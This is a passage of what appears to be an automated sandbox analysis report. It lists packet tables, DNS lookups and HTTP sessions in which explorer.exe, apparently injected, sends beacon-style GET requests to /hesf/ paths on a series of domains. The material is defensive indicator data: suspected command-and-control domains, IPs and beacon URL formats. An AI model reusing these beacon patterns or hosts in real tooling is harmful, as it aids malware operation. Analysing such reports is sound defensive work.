                                                                                                  Oct 6, 2023 15:47:46.289988995 CEST804971662.72.50.244192.168.2.8
                                                                                                  Oct 6, 2023 15:48:06.294266939 CEST4971980192.168.2.866.96.160.140
                                                                                                  Oct 6, 2023 15:48:06.495479107 CEST804971966.96.160.140192.168.2.8
                                                                                                  Oct 6, 2023 15:48:06.495553970 CEST4971980192.168.2.866.96.160.140
                                                                                                  Oct 6, 2023 15:48:06.495640039 CEST4971980192.168.2.866.96.160.140
                                                                                                  Oct 6, 2023 15:48:06.698400974 CEST804971966.96.160.140192.168.2.8
                                                                                                  Oct 6, 2023 15:48:06.739032984 CEST804971966.96.160.140192.168.2.8
                                                                                                  Oct 6, 2023 15:48:06.739085913 CEST804971966.96.160.140192.168.2.8
                                                                                                  Oct 6, 2023 15:48:06.739171982 CEST4971980192.168.2.866.96.160.140
                                                                                                  Oct 6, 2023 15:48:06.739171982 CEST4971980192.168.2.866.96.160.140
                                                                                                  Oct 6, 2023 15:48:06.940284967 CEST804971966.96.160.140192.168.2.8
                                                                                                  Oct 6, 2023 15:48:27.122734070 CEST4972080192.168.2.8103.224.182.242
                                                                                                  Oct 6, 2023 15:48:27.267716885 CEST8049720103.224.182.242192.168.2.8
                                                                                                  Oct 6, 2023 15:48:27.268038988 CEST4972080192.168.2.8103.224.182.242
                                                                                                  Oct 6, 2023 15:48:27.268038988 CEST4972080192.168.2.8103.224.182.242
                                                                                                  Oct 6, 2023 15:48:27.461694956 CEST8049720103.224.182.242192.168.2.8
                                                                                                  Oct 6, 2023 15:48:27.500077009 CEST8049720103.224.182.242192.168.2.8
                                                                                                  Oct 6, 2023 15:48:27.500139952 CEST8049720103.224.182.242192.168.2.8
                                                                                                  Oct 6, 2023 15:48:27.500360012 CEST4972080192.168.2.8103.224.182.242
                                                                                                  Oct 6, 2023 15:48:27.500360012 CEST4972080192.168.2.8103.224.182.242
                                                                                                  Oct 6, 2023 15:48:27.645713091 CEST8049720103.224.182.242192.168.2.8
                                                                                                  Oct 6, 2023 15:48:47.604156017 CEST4972180192.168.2.875.2.115.196
                                                                                                  Oct 6, 2023 15:48:47.738956928 CEST804972175.2.115.196192.168.2.8
                                                                                                  Oct 6, 2023 15:48:47.739032984 CEST4972180192.168.2.875.2.115.196
                                                                                                  Oct 6, 2023 15:48:47.739145994 CEST4972180192.168.2.875.2.115.196
                                                                                                  Oct 6, 2023 15:48:47.873990059 CEST804972175.2.115.196192.168.2.8
                                                                                                  Oct 6, 2023 15:48:48.156855106 CEST804972175.2.115.196192.168.2.8
                                                                                                  Oct 6, 2023 15:48:48.156898975 CEST804972175.2.115.196192.168.2.8
                                                                                                  Oct 6, 2023 15:48:48.157082081 CEST4972180192.168.2.875.2.115.196
                                                                                                  Oct 6, 2023 15:48:48.157118082 CEST4972180192.168.2.875.2.115.196
                                                                                                  Oct 6, 2023 15:48:48.170581102 CEST804972175.2.115.196192.168.2.8
                                                                                                  Oct 6, 2023 15:48:48.170659065 CEST4972180192.168.2.875.2.115.196
                                                                                                  Oct 6, 2023 15:48:48.291981936 CEST804972175.2.115.196192.168.2.8

                                                                                                  UDP Packets

                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                  Oct 6, 2023 15:46:04.416234016 CEST5918453192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:46:05.112912893 CEST53591841.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:46:24.462126970 CEST5282353192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:46:24.621404886 CEST53528231.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:46:44.368113041 CEST5535553192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:46:44.517919064 CEST53553551.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:47:04.713597059 CEST6532653192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:47:05.363195896 CEST53653261.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:47:25.055834055 CEST5518653192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:47:26.070884943 CEST5518653192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:47:26.297071934 CEST53551861.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:47:45.540530920 CEST5027553192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:47:45.723089933 CEST53502751.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:48:05.838570118 CEST5849053192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:48:06.283337116 CEST53584901.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:48:26.962131023 CEST6464953192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:48:27.121669054 CEST53646491.1.1.1192.168.2.8
                                                                                                  Oct 6, 2023 15:48:47.337629080 CEST5198453192.168.2.81.1.1.1
                                                                                                  Oct 6, 2023 15:48:47.603353024 CEST53519841.1.1.1192.168.2.8

                                                                                                  DNS Queries

                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                  Oct 6, 2023 15:46:04.416234016 CEST192.168.2.81.1.1.10xdccaStandard query (0)www.othersidewear.comA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:46:24.462126970 CEST192.168.2.81.1.1.10xf5d8Standard query (0)www.91fulizifen.comA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:46:44.368113041 CEST192.168.2.81.1.1.10x10efStandard query (0)www.pendletonofficial.shopA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:04.713597059 CEST192.168.2.81.1.1.10x362bStandard query (0)www.shayun.netA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:25.055834055 CEST192.168.2.81.1.1.10x1316Standard query (0)www.brownkrosshui.comA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:26.070884943 CEST192.168.2.81.1.1.10x1316Standard query (0)www.brownkrosshui.comA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:45.540530920 CEST192.168.2.81.1.1.10xaad1Standard query (0)www.usbulletinnow.comA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:48:05.838570118 CEST192.168.2.81.1.1.10x2e6fStandard query (0)www.im-newbie-journal.onlineA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:48:26.962131023 CEST192.168.2.81.1.1.10x518bStandard query (0)www.tygyro.comA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:48:47.337629080 CEST192.168.2.81.1.1.10x1a82Standard query (0)www.87b52.clubA (IP address)IN (0x0001)false

                                                                                                  DNS Answers

                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                  Oct 6, 2023 15:46:05.112912893 CEST1.1.1.1192.168.2.80xdccaNo error (0)www.othersidewear.com77.222.40.147A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:46:24.621404886 CEST1.1.1.1192.168.2.80xf5d8No error (0)www.91fulizifen.com142.234.186.98A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:46:44.517919064 CEST1.1.1.1192.168.2.80x10efName error (3)www.pendletonofficial.shopnonenoneA (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:05.363195896 CEST1.1.1.1192.168.2.80x362bNo error (0)www.shayun.netoverdue.aliyun.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:05.363195896 CEST1.1.1.1192.168.2.80x362bNo error (0)overdue.aliyun.com170.33.13.246A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:26.297071934 CEST1.1.1.1192.168.2.80x1316No error (0)www.brownkrosshui.comparkingpage.namecheap.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:26.297071934 CEST1.1.1.1192.168.2.80x1316No error (0)parkingpage.namecheap.com91.195.240.19A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:45.723089933 CEST1.1.1.1192.168.2.80xaad1No error (0)www.usbulletinnow.comusbulletinnow.comCNAME (Canonical name)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:47:45.723089933 CEST1.1.1.1192.168.2.80xaad1No error (0)usbulletinnow.com62.72.50.244A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:48:06.283337116 CEST1.1.1.1192.168.2.80x2e6fNo error (0)www.im-newbie-journal.online66.96.160.140A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:48:27.121669054 CEST1.1.1.1192.168.2.80x518bNo error (0)www.tygyro.com103.224.182.242A (IP address)IN (0x0001)false
                                                                                                  Oct 6, 2023 15:48:47.603353024 CEST1.1.1.1192.168.2.80x1a82No error (0)www.87b52.club75.2.115.196A (IP address)IN (0x0001)false

                                                                                                  HTTP Request Dependency Graph

                                                                                                  • www.othersidewear.com
                                                                                                  • www.91fulizifen.com
                                                                                                  • www.shayun.net
                                                                                                  • www.brownkrosshui.com
                                                                                                  • www.usbulletinnow.com
                                                                                                  • www.im-newbie-journal.online
                                                                                                  • www.tygyro.com
                                                                                                  • www.87b52.club

                                                                                                  HTTP Packets

                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  0192.168.2.84971177.222.40.14780C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:46:05.442049026 CEST73OUTGET /hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.othersidewear.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:46:06.205346107 CEST74INHTTP/1.1 301 Moved Permanently
                                                                                                  Server: nginx/1.23.2
                                                                                                  Date: Fri, 06 Oct 2023 13:46:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Content-Length: 0
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  X-Powered-By: PHP/7.4.33
                                                                                                  Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                  Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                  X-Redirect-By: WordPress
                                                                                                  Location: http://othersidewear.com/hesf/?jBZ=szcn2kpEQ6L2Syu9mG2pKozAyrZLMpz3ThmLak2r9KpoKfLz6EjH9XrJVzpw+e6nWP1B&Gvw=T4RpitPpFtBLx


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  1192.168.2.849713142.234.186.9880C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:46:24.770092010 CEST77OUTGET /hesf/?jBZ=d2AGz1H3YsI9kghQJOJ7DZyuiCPgqoB+sSxuqf6m27exoGivXrHz5sUA11+t0RjRixK2&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.91fulizifen.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:46:24.918895960 CEST79INHTTP/1.1 200 OK
                                                                                                  Server: nginx
                                                                                                  Date: Fri, 06 Oct 2023 13:46:24 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Vary: Accept-Encoding
                                                                                                  Data Raw: 36 36 39 0d 0a 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 76 61 72 20 62 70 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 0a 20 20 20 20 76 61 72 20 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 20 20 20 20 69 66 20 28 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 3d 3d 20 27 68 74 74 70 73 27 29 20 7b 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 73 3a 2f 2f 7a 7a 2e 62 64 73 74 61 74 69 63 2e 63 6f 6d 2f 6c 69 6e 6b 73 75 62 6d 69 74 2f 70 75 73 68 2e 6a 73 27 3b 0a 20 20 20 20 7d 0a 20 20 20 20 65 6c 73 65 20 7b 0a 20 20 20 20 20 20 20 20 62 70 2e 73 72 63 20 3d 20 27 68 74 74 70 3a 2f 2f 70 75 73 68 2e 7a 68 61 6e 7a 68 61 6e 67 2e 62 61 69 64 75 2e 63 6f 6d 2f 70 75 73 68 2e 6a 73 27 3b 0a 20 20 20 20 7d 0a 20 20 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 0a 20 20 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 62 70 2c 20 73 29 3b 0a 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 09 09 76 61 72 20 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 2c 20 63 75 72 50 72 6f 74 6f 63 6f 6c 3b 0a 09 09 2f 2f 47 65 74 20 74 68 65 20 20 74 61 67 0a 09 09 76 61 72 20 78 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 6c 69 6e 6b 22 29 3b 0a 09 09 2f 2f 46 69 6e 64 20 74 68 65 20 6c 61 73 74 20 63 61 6e 6f 6e 69 63 61 6c 20 55 52 4c 0a 09 09 69 66 28 78 2e 6c 65 6e 67 74 68 20 3e 20 30 29 7b 0a 09 09 09 66 6f 72 20 28 69 3d 30 3b 69 3c 78 2e 6c 65 6e 67 74 68 3b 69 2b 2b 29 7b 0a 09 09 09 09 69 66 28 78 5b 69 5d 2e 72 65 6c 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 20 3d 3d 20 27 63 61 6e 6f 6e 69 63 61 6c 27 20 26 26 20 78 5b 69 5d 2e 68 72 65 66 29 7b 0a 09 09 09 09 09 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 3d 78 5b 69 5d 2e 68 72 65 66 3b 0a 09 09 09 09 7d 0a 09 09 09 7d 0a 09 09 7d 0a 09 09 2f 2f 47 65 74 20 70 72 6f 74 6f 63 6f 6c 0a 09 20 20 20 20 69 66 20 28 21 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 29 7b 0a 09 20 20 20 20 09 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 72 6f 74 6f 63 6f 6c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 09 20 20 20 20 7d 0a 09 20 20 20 20 65 6c 73 65 7b 0a 09 20 20 20 20 09 63 75 72 50 72 6f 74 6f 63 6f 6c 20 3d 20 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 2e 73 70 6c 69 74 28 27 3a 27 29 5b 30 5d 3b 0a 09 20 20 20 20 7d 0a 09 20 20 20 20 2f 2f 47 65 74 20 63 75 72 72 65 6e 74 20 55 52 4c 20 69 66 20 74 68 65 20 63 61 6e 6f 6e 69 63 61 6c 20 55 52 4c 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 0a 09 20 20 20 20 69 66
                                                                                                  Data Ascii: 669<html><head><title>403 Not Found</title></head><body><center><h1>403 Not Found</h1></center><hr><center>nginx</center><script>(function(){ var bp = document.createElement('script'); var curProtocol = window.location.protocol.split(':')[0]; if (curProtocol === 'https') { bp.src = 'https://zz.bdstatic.com/linksubmit/push.js'; } else { bp.src = 'http://push.zhanzhang.baidu.com/push.js'; } var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(bp, s);})();</script><script><script>(function(){var canonicalURL, curProtocol;//Get the tagvar x=document.getElementsByTagName("link");//Find the last canonical URLif(x.length > 0){for (i=0;i<x.length;i++){if(x[i].rel.toLowerCase() == 'canonical' && x[i].href){canonicalURL=x[i].href;}}}//Get protocol if (!canonicalURL){ curProtocol = window.location.protocol.split(':')[0]; } else{ curProtocol = canonicalURL.split(':')[0]; } //Get current URL if the canonical URL does not exist if
                                                                                                  Oct 6, 2023 15:46:24.918935061 CEST79INData Raw: 20 28 21 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 29 20 63 61 6e 6f 6e 69 63 61 6c 55 52 4c 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3b 0a 09 20 20 20 20 2f 2f 41 73 73 69 67 6e 20 73 63 72 69 70 74 20 63 6f 6e 74 65 6e 74
                                                                                                  Data Ascii: (!canonicalURL) canonicalURL = window.location.href; //Assign script content. Replace current URL with the canonical URL !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=canonicalURL,t=document.referrer;if(!e.
                                                                                                  Oct 6, 2023 15:46:24.918970108 CEST79INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  2192.168.2.849714170.33.13.24680C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:47:05.527481079 CEST80OUTGET /hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.shayun.net
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:47:06.003338099 CEST81INHTTP/1.1 403 Forbidden
                                                                                                  Date: Fri, 06 Oct 2023 13:47:05 GMT
                                                                                                  Content-Type: text/html
                                                                                                  Content-Length: 673
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 20 53 6f 72 72 79 20 66 6f 72 20 74 68 65 20 69 6e 63 6f 6e 76 65 6e 69 65 6e 63 65 2e 3c 62 72 2f 3e 0d 0a 50 6c 65 61 73 65 20 72 65 70 6f 72 74 20 74 68 69 73 20 6d 65 73 73 61 67 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 20 74 68 65 20 66 6f 6c 6c 6f 77 69 6e 67 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 74 6f 20 75 73 2e 3c 62 72 2f 3e 0d 0a 54 68 61 6e 6b 20 79 6f 75 20 76 65 72 79 20 6d 75 63 68 21 3c 2f 70 3e 0d 0a 3c 74 61 62 6c 65 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 55 52 4c 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 68 74 74 70 3a 2f 2f 77 77 77 2e 73 68 61 79 75 6e 2e 6e 65 74 2f 68 65 73 66 2f 3f 6a 42 5a 3d 72 42 42 6d 37 39 79 57 6a 2f 30 73 63 54 75 33 35 6e 42 54 6a 65 66 48 42 33 79 48 46 52 2f 39 75 4e 38 49 58 6f 69 30 44 52 62 67 4d 62 64 32 63 6e 4d 76 73 5a 59 58 46 75 70 73 48 51 33 6d 71 79 37 4a 26 61 6d 70 3b 47 76 77 3d 54 34 52 70 69 74 50 70 46 74 42 4c 78 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 53 65 72 76 65 72 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 69 7a 6a 36 63 64 77 37 33 6f 71 39 37 32 73 39 73 37 78 6a 68 78 7a 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 74 72 3e 0d 0a 3c 74 64 3e 44 61 74 65 3a 3c 2f 74 64 3e 0d 0a 3c 74 64 3e 32 30 32 33 2f 31 30 2f 30 36 20 32 31 3a 34 37 3a 30 35 3c 2f 74 64 3e 0d 0a 3c 2f 74 72 3e 0d 0a 3c 2f 74 61 62 6c 65 3e 0d 0a 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 2f 32 2e 33 2e 32 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 74 65 6e 67 69 6e 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center> Sorry for the inconvenience.<br/>Please report this message and include the following information to us.<br/>Thank you very much!</p><table><tr><td>URL:</td><td>http://www.shayun.net/hesf/?jBZ=rBBm79yWj/0scTu35nBTjefHB3yHFR/9uN8IXoi0DRbgMbd2cnMvsZYXFupsHQ3mqy7J&amp;Gvw=T4RpitPpFtBLx</td></tr><tr><td>Server:</td><td>izj6cdw73oq972s9s7xjhxz</td></tr><tr><td>Date:</td><td>2023/10/06 21:47:05</td></tr></table><hr/>Powered by Tengine/2.3.2<hr><center>tengine</center></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                  3192.168.2.84971591.195.240.1980C:\Windows\explorer.exe
                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                  Oct 6, 2023 15:47:26.584408998 CEST82OUTGET /hesf/?jBZ=Zexu6rzcFbxF4r/yRE1P6uhuDniKqQl2K3Z2GVMnXCfVfpJX9615KGPJ2pRkkggZfWm9&Gvw=T4RpitPpFtBLx HTTP/1.1
                                                                                                  Host: www.brownkrosshui.com
                                                                                                  Connection: close
                                                                                                  Data Raw: 00 00 00 00 00 00 00
                                                                                                  Data Ascii:
                                                                                                  Oct 6, 2023 15:47:26.904335976 CEST84INHTTP/1.1 200 OK
                                                                                                  date: Fri, 06 Oct 2023 13:47:26 GMT
                                                                                                  content-type: text/html; charset=UTF-8
                                                                                                  transfer-encoding: chunked
                                                                                                  vary: Accept-Encoding
                                                                                                  x-powered-by: PHP/8.1.17
                                                                                                  expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                  cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                  pragma: no-cache
                                                                                                  x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Nh1jE+ZPH6FkiMhXIXgNE3BiRY7KJZSXir/jo+kbNPlv3WqxUpPB5zgVJa6pRJgXnKO+lsBVBhk9Jesw5ENKgA==
                                                                                                  last-modified: Fri, 06 Oct 2023 13:47:26 GMT
                                                                                                  x-cache-miss-from: parking-697977dd84-lqf6d
                                                                                                  server: NginX
                                                                                                  connection: close
                                                                                                  Data Raw: 32 43 45 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 6e 79 6c 57 77 32 76 4c 59 34 68 55 6e 39 77 30 36 7a 51 4b 62 68 4b 42 66 76 6a 46 55 43 73 64 46 6c 62 36 54 64 51 68 78 62 39 52 58 57 58 75 49 34 74 33 31 63 2b 6f 38 66 59 4f 76 2f 73 38 71 31 4c 47 50 67 61 33 44 45 31 4c 2f 74 48 55 34 4c 45 4e 4d 43 41 77 45 41 41 51 3d 3d 5f 4e 68 31 6a 45 2b 5a 50 48 36 46 6b 69 4d 68 58 49 58 67 4e 45 33 42 69 52 59 37 4b 4a 5a 53 58 69 72 2f 6a 6f 2b 6b 62 4e 50 6c 76 33 57 71 78 55 70 50 42 35 7a 67 56 4a 61 36 70 52 4a 67 58 6e 4b 4f 2b 6c 73 42 56 42 68 6b 39 4a 65 73 77 35 45 4e 4b 67 41 3d 3d 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 3c 74 69 74 6c 65 3e 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 2e 63 6f 6d 26 6e 62 73 70 3b 2d 26 6e 62 73 70 3b 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 20 52 65 73 6f 75 72 63 65 73 20 61 6e 64 20 49 6e 66 6f 72 6d 61 74 69 6f 6e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 2e 63 6f 6d 20 69 73 20 79 6f 75 72 20 66 69 72 73 74 20 61 6e 64 20 62 65 73 74 20 73 6f 75 72 63 65 20 66 6f 72 20 61 6c 6c 20 6f 66 20 74 68 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 79 6f 75 e2 80 99 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 2e
                                                                                                  Data Ascii: 2CE<!DOCTYPE html><html lang="en" data-adblockkey=MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANnylWw2vLY4hUn9w06zQKbhKBfvjFUCsdFlb6TdQhxb9RXWXuI4t31c+o8fYOv/s8q1LGPga3DE1L/tHU4LENMCAwEAAQ==_Nh1jE+ZPH6FkiMhXIXgNE3BiRY7KJZSXir/jo+kbNPlv3WqxUpPB5zgVJa6pRJgXnKO+lsBVBhk9Jesw5ENKgA==><head><meta charset="utf-8"><title>brownkrosshui.com&nbsp;-&nbsp;brownkrosshui Resources and Information.</title><meta name="viewport" content="width=device-width,initial-scale=1.0,maximum-scale=1.0,user-scalable=0"><meta name="description" content="brownkrosshui.com is your first and best source for all of the information youre looking for.
                                                                                                  Oct 6, 2023 15:47:26.904655933 CEST85INData Raw: 20 46 72 6f 6d 20 67 65 6e 65 72 61 6c 20 74 6f 70 69 63 73 20 74 6f 20 6d 6f 72 65 20 6f 66 20 77 68 61 74 20 79 6f 75 20 77 6f 75 6c 64 20 65 78 70 65 63 74 20 74 6f 20 66 69 6e 64 20 68 65 72 65 2c 20 62 72 6f 77 6e 6b 72 6f 73 73 68 75 69 2e
                                                                                                  Data Ascii: From general topics to more of what you would expect to find here, brownkrosshui.com has it all. We hope AECyou find what you are searching for!"><link rel="icon" type="image/png" href="//img.sedoparking.com/templa
